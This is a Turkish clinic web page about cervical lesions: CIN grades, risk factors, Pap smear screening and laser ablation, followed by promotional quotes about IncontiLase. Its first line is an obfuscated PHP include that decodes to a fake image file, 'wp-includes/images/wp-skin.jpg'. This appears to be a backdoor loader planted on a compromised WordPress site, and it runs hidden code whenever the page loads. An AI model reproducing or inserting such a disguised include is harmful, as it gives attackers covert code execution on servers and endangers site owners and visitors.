@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); Lazerle Vajinal Tedavi ve Estetik - Serviks Lezyonları
tedaviler_serviks_lezyonlari

Serviks Lezyonları

Serviks (diğer bir deyişle rahim ağzı) rahimin vajinaya açılan dar boynudur. Enfeksiyonların rahme (uterus) ulaşmasını engelleyen önemli bir bariyer görevi görür. Gebelik sırasında serviks, bebeği rahim içinde tutmaya yardımcı olmak için sıkıca kapalı durumda kalırken bebek doğmaya hazır olduğunda yaklaşık 10 cm açılarak bebeğin geçmesine izin verir.

Serviks lezyonları, rahim ağzında oluşan anormal dokulardır. Bunlara serviks kanser öncüsü lezyonlar da denir çünkü eğer tedavi edilmezlerse serviks kanserine dönüşebilirler. Bu lezyonlardan alınan örneğin laboratuvar incelemesine PAP smear testi adı verilmektedir. Serviksteki kanser öncesi değişikliklerin saptanmasını sağlayan PAP smear testi sayesinde son 50 yıl içinde serviks kanserinden ölüm oranları %50-70 azalmıştır.

PAP smear testi, serviks lezyonunun varlığını doğrular ve derecelendirir. Bu derecelendirme CIN1-CIN3 arasında olur (Hafif/Orta/Ağır).

CIN: Cervical Intraepitelyal Neoplazi=Serviks Kanser Öncüsü Lezyon

Servikal displazinin kansere dönüşmesi yaklaşık 10-15 yıl alır ancak her CIN vakası kansere dönüşmez. Hatta CIN 1 vakaları tamamen normale dönebilirler. Bu nedenle displazilerde erken tanı ve tedavi kanserden korunmada önemlidir.

CIN1: Hafif displazi. Epitelyal yüzeyin %25’i tutulmuş.

CIN2: Ilımlı displazi. Epitelyal yüzeyin %50’si tutulmuş.

CIN3: Ağır displazi. Epitelyal yüzeyin %75 veya daha fazlası tutulmuş.
KANSER: Artık anormal şekil ve büyüklükteki displazik hücreler bazal membranın altına inmiş, yayılım başlamıştır.

CIN risk faktörleri:

· Genital Siğil enfeksiyonu geçirmiş olmak

· Erken yaşta başlayan cinsel yaşam (20 yaşından önce)

· Çok eşlilik veya eşin çok eşli bir yaşam sürmesi

. Kötü hijyen

. Doğum sayısında çok fazlalık (7 ve yukarı)

. Yetersiz beslenme (özellikle vitamin C, vitamin A, beta karoten ve folat eksikliği)

. Sigara kullanımı

Serviks lezyonlarının lazer tedavisi hastaya fazla rahatsızlık vermeyen, genellikle lokal anestezi ile kısa süren bir ablasyon yöntemiyle yapılmaktadır. Lazerin doku seçici avantajı ile çevre ve derin dokulara zarar verilmez. Uygulama normal olarak hastanede yatmayı gerektirmez. Doktorunuz lezyonun seviyesine göre size en uygun lazer tedavi protokolünü seçecektir.

Doktora Sorun

* alanları doldurmanız zorunludur
  • dr2
    "Non-invaziv olmasının yanı sıra, IncontiLase’in temel avantajı ayakta tedavi prosedürüyle uygulanabilmesidir. Bu da hastalardaki ekonomik yükü azaltıyor."
    Dr. Urska Bizjak Ogrinc
  • dr1
    IncontiLasetedavisini takip eden bir yıl içinde SUI tanısı koyulan hastaların %77’sinde iyileşme görüldü.
    Dr. Sabina Sencar